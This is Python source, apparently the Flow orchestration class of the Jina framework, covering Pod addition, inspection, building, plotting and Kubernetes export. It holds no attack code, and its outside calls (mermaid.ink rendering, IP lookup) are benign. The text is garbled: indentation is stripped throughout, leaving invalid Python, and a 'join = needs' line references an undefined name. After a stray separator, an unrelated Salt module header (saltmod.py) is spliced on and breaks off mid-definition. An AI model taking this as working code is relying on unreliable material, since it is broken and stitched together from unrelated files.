            - currently only a flattened structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
          When used under Python, one can additionally use the following values:
          - a Python dict that represents the config
          - a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
        :param uses_after_address: The address of the uses-after runtime
        :param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
op_flow._pod_nodes[pod_name] = Pod(args, needs)
op_flow.last_pod = pod_name
return op_flow
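    # Hedged usage sketch (names and `uses` values are illustrative): `add`
    # returns the modified copy by default (`copy_flow=True`), so calls chain.
    #
    #   f = (
    #       Flow()
    #       .add(name='encoder', uses='jinahub://MyEncoder')
    #       .add(name='indexer', uses='my_indexer_config.yml')
    #   )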
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
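# Hedged usage sketch (the Pod names below are hypothetical, for illustration only): an inspect
# Pod hangs off the last-added Pod, and gather_inspect() -- auto-called on build unless
# inspect=FlowInspectType.REMOVE -- joins all inspect Pods into one JOIN_INSPECT Pod:
#
#   f = (Flow()
#        .add(name='encoder')
#        .inspect(name='monitor')   # observes 'encoder' without changing the main data path
#        .add(name='indexer'))
#   f.build()                       # gather_inspect() runs here when inspection is kept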
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify the Flow in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double-check whether this is intentional or a mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# not clear why, but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not _pod.external:
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted because {error_pods} could not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
results_as_docarray=True,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if self._pod_nodes[need].external:
_s_role = 'EXTERNAL'
if self._pod_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append('classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append('\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided, it will create a jpg image with that name;
otherwise it will display the URL for mermaid.
If called within an IPython notebook, it will be rendered inline;
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting so the gateway connection can be shown more accurately
:param copy_flow: when set to True, always copy the current Flow and
apply the modification on the copy and return it; otherwise, modify the Flow in place
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except Exception:
# IPython may be unavailable or display may fail; no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL that points to an SVG image. It requires an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the URL that points to the rendered image
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
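# Minimal sketch of the URL construction above (illustrative only): the mermaid source is
# base64-encoded and appended to the mermaid.ink endpoint, e.g.
#
#   encoded = base64.b64encode(b'flowchart LR;\na --> b;').decode('utf-8')
#   url = f'https://mermaid.ink/svg/{encoded}'   # open in a browser to render the diagram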
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new host of the Flow
"""
self._common_kwargs['host'] = value
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that, once set, returns control
to the main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is already running, the protocol can't be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
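# Hedged usage sketch (the endpoint names and arguments below are hypothetical, illustration
# only): with an HTTP Flow, an Executor endpoint can be exposed with extra OpenAPI metadata.
#
#   f = Flow(protocol='http')
#   f.expose_endpoint('/foo', summary='my endpoint', methods=['POST'])
#   # a POST to http://hostname:port/foo is then routed to the Executor method
#   # decorated with @requests(on='/foo')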
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating whether the Kubernetes connection pool should be used inside the Executor runtimes.
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.pods.config.k8s import K8sPodConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._pod_nodes.items():
pod_base = os.path.join(output_base_path, node)
k8s_pod = K8sPodConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_pod_addresses=self._get_k8s_pod_addresses(k8s_namespace)
if (node == 'gateway' and not k8s_connection_pool)
else None,
)
configs = k8s_pod.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(pod_base, f'{name}.yml')
os.makedirs(pod_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.pods.config.docker_compose import DockerComposeConfig
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._pod_nodes.items():
docker_compose_pod = DockerComposeConfig(
args=v.args,
pod_addresses=self._get_docker_compose_pod_addresses(),
)
service_configs = docker_compose_pod.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the number of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
# ensure kwargs is always defined, even when 'port_expose' was never set
kwargs = copy.deepcopy(self._common_kwargs)
if 'port_expose' in kwargs:
    kwargs['port'] = kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
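# Hedged end-to-end sketch of the Flow API defined above (the Pod names, port and file name
# are hypothetical, illustration only; Flow here is the class defined in this module).
if __name__ == '__main__':
    f = Flow(protocol='http', port_expose=12345).add(name='pod_a').add(name='pod_b', needs='pod_a')
    f.plot('flow.svg')  # render the topology via mermaid.ink
    with f:             # the context manager builds and starts the Flow
        f.block()       # block until KeyboardInterrupt or a stop event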
|
saltmod.py
|
"""
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded:: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
"""
import fnmatch
import logging
import sys
import threading
import time
import salt.exceptions
import salt.output
import salt.syspaths
import salt.utils.data
import salt.utils.event
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "salt"
def __virtual__():
